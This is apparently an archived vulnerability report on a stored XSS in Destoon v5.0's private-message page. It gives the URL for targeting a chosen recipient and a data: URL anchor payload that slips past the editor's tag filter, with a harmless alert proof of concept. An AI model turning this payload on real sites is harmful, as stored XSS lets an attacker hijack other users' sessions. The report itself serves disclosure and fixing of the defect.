### Brief description:
destoon /v5.0/ stored XSS, target any chosen user (filter bypass 1)
### Details:
Previously reported: [WooYun: destoon /v5.0/ stored XSS, target any chosen user](http://www.wooyun.org/bugs/wooyun-2014-055638)
Register a user, then open the private-message send page with the victim as `touser`:
http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa
The reply box uses the rich-text editor.
The editor's filter lets some tags through unchanged, so the message body is stored and rendered to the chosen recipient with the XSS intact: the tag allowlist keeps `<a>`, but the `href` scheme is never checked, so a `data:` URL carrying an HTML document with a script survives. The base64 body below decodes to `<script>alert(document.domain)</script>`. Note that current browsers block top-level navigation to `data:` URLs and give them an opaque origin, so this exact click-to-trigger vector is much weaker today than in 2014; the underlying defect, an unvalidated `href` scheme in a stored message, is what needs fixing.
XSS payload:
```
<a href="data:text/html;charset=utf-8;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Og=="> click</a>
```
### Proof of concept:
![22222222222222222222222222222.jpg](https://images.seebug.org/upload/201405/16235012ca70002b8abb56db18ff466031c8eac7.jpg)
![222223333.jpg](https://images.seebug.org/upload/201405/16235028a7af80687d46bea4865fe4f05df3232e.jpg)
![33333333333333333333.jpg](https://images.seebug.org/upload/201405/162350459a6e0571f536d79e35e77f617999548f.jpg)